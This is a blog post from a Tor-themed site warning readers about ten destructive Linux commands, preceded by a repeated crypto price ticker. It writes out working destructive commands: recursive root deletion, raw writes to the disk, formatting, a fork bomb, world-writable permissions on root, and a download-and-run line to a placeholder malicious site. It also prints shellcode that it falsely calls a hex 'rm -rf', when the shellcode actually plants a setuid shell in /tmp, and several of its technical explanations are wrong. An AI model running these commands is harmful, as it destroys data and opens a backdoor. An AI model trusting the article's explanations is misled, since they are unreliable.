BTC $63106.6694
ETH $3487.9438
BNB $414.1963
SOL $130.3204
XRP $0.6266
ADA $0.7278
DOGE $0.1539
AVAX $42.5755
DOT $9.7892
wstETH $4037.4917
TRX $0.1406
LINK $20.4990
WETH $3499.8168
UNI $12.6173
MATIC $1.0884
WBTC $63001.9284
BCH $469.6209
LTC $90.6161
IMX $3.3186
ICP $13.1704
FIL $10.4844
CAKE $3.3134
ETC $33.5274
LEO $4.7930
RNDR $7.5543
ATOM $12.1588
TON $2.6746
KAS $0.1670
HBAR $0.1129
INJ $40.6985
DAI $0.9987
OKB $58.1613
VET $0.0490
FDUSD $0.9985
WEMIX $2.8142
STX $3.0406
XMR $150.5516
XLM $0.1355
GRT $0.3198
NEAR $4.4292
LDO $3.3186
ARB $2.0442
PEPE $0.0000
THETA $2.3783
TIA $16.3918
ENS $22.1565
CRO $0.1418
BTC $63106.6694
ETH $3487.9438
BNB $414.1963
SOL $130.3204
XRP $0.6266
ADA $0.7278
DOGE $0.1539
AVAX $42.5755
DOT $9.7892
wstETH $4037.4917
TRX $0.1406
LINK $20.4990
WETH $3499.8168
UNI $12.6173
MATIC $1.0884
WBTC $63001.9284
BCH $469.6209
LTC $90.6161
IMX $3.3186
ICP $13.1704
FIL $10.4844
CAKE $3.3134
ETC $33.5274
LEO $4.7930
RNDR $7.5543
ATOM $12.1588
TON $2.6746
KAS $0.1670
HBAR $0.1129
INJ $40.6985
DAI $0.9987
OKB $58.1613
VET $0.0490
FDUSD $0.9985
WEMIX $2.8142
STX $3.0406
XMR $150.5516
XLM $0.1355
GRT $0.3198
NEAR $4.4292
LDO $3.3186
ARB $2.0442
PEPE $0.0000
THETA $2.3783
TIA $16.3918
ENS $22.1565
CRO $0.1418
  • Catalog
  • Blog
  • Tor Relay
  • Jabber
  • One-Time notes
  • Temp Email
  • What is TOR?
  • We are in tor
  • 10 Linux Commands That Can Destroy Your System


    As we know, Linux users have many commands and tools that allow them to flexibly customize and control every aspect of the OS. However, with great power comes great responsibility - there are many commands that can disrupt the normal operation of Linux and lead to unfortunate consequences.

    Therefore, let's figure out together which Linux commands should not be entered under any circumstances.

    The killer command rm -rf /*

    rm -rf /* is the most favorite command among Internet trolls, who like to cruelly mock newbies by throwing this command into various discussions and chats. Let's explore it in more detail:

    rm is a command for deleting files/directories;
    -r - flag required to recursively delete all files inside the folder;
    -f is a flag that allows you to perform the operation without asking the user.

    Without root rights, this command will not do any harm. Even sudo rm -rf / will not create any problems, since most popular distributions have protection against this command. The --preserve-root function is responsible for this.

    However, if you still want to run this command, you have two options:

    with protection disabled: sudo rm -rf / --no-preserve-root
    and more simple: sudo rm -rf /*

    After execution, the system will start recursively deleting all files in general, starting from the root directory, until the system hangs with the message “Error deleting file”. After a reboot, Linux usually throws a grub-rescue error.

    /dev/sda - Destroying the file system!

    Users familiar with filesystems will probably know what > ​​/dev/sda is. This line runs the command and sends the result of its work directly to the hard disk, writing data directly to it, thereby damaging the file system. Here is an example:

    echo "Hello" > /dev/sda

    The command will replace the partition containing all the data needed to boot the system with the string "Hello".

    mv ~ /dev/null or how to send all your data to the abyss

    Inside every Linux system there is an abyss. And this abyss is /dev/null. Anything in this area will be permanently deleted. Let's take a look at this command:

    mv - needed to transfer files and directories to a specified location;
    ~ - pointer to the home directory;
    /dev/null - Moves your home directory to /dev/null, destroying all your files and deleting copies of the originals.

    And although the system will not give an error and will work properly, after executing mv ~ /dev/null, all user data will disappear without a trace.

    Formatting the hard drive with mkfs.ext3 /dev/sda

    A command similar to format c: on Windows. It is set up quite simply:

    mkfs.ex3 - creates a new ext3 file system on the device;
    /dev/sda - points to the hard drive.

    That's all! A simple command leaves the user without all the data.

    Fork bomb: simple but dangerous

    :(){:|:&};: - a combination of special characters, as if chosen at random. However, it is powerful enough to bring a running system to a halt simply by taking up all available resources.

    It works extremely simply - it creates a function that launches two more of its instances, which will then repeat this process. And this will continue until the process takes up all the physical memory of the computer, causing it to freeze.

    command > config_filename - overwrite important configuration files

    With command > config_filename it's simple - it just clears the contents of the configuration file and writes new data to it. Thus, it is easy to damage the system by accidentally overwriting an important configuration file.

    Molotov cocktail recipe for root partitions - dd if=/dev/random of=/dev/sda

    Everything is simple here - the command clogs the computer's memory with garbage. And here's how she does it:

    dd is a low-level copy tool;
    if=/dev/random - sets /dev/random as an input;
    of=/dev/sda - writes data to the hard drive.

    A powerful computer is able to withstand this command, but weak systems can suffer very badly.

    chmod -R 777/ - a command for those who have nothing to hide

    chmod -R 777/ gives access to all files located in the root partition. This is not very good, since after the command is executed, any user has the right to read, write and execute any files.

    If you love taking risks, run wget http://malicious_site -O- | sh

    A command that allows you to download and execute a script taken from a site on the Internet. In this case, if the script turns out to be malicious, then the security of the entire user's system will be at risk, because the command will execute it with root rights, without even asking permission to execute.

    The most unusual in the end is the masked rm -rf /*

    Linux allows you to run commands in the terminal in a variety of ways. One of them is to enter the command in hexadecimal code.

    Example:

    char esp[] __attribute__ ((section(“.text”))) /* e.s.p release */ = “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68” “\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99” “\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7” “\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56” “\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31” “\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69” “\x6e\x2f\x73\x68\x00\x2d\x63\x00” “cp -p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;”;

    Despite its unusual appearance, this command is a hexadecimal rm -rf /*. So be careful copying unusual commands!

    Summing up

    Remember that it is you who is responsible for the consequences of the thoughtless execution of dangerous commands. After all, UNIX's job is not to keep you from shooting yourself in the foot. It's that if you decide to do it - to send a bullet to your leg in the most effective way that it has.

    This applies to Linux to the same extent. You get full control over your system and only you decide what to do with it.

    Author DeepWeb
    Scientists have discovered three new strains of ransomware in the wild
    Hackers use the Sign of the Internet to deliver malware

    Comments 0

    Add comment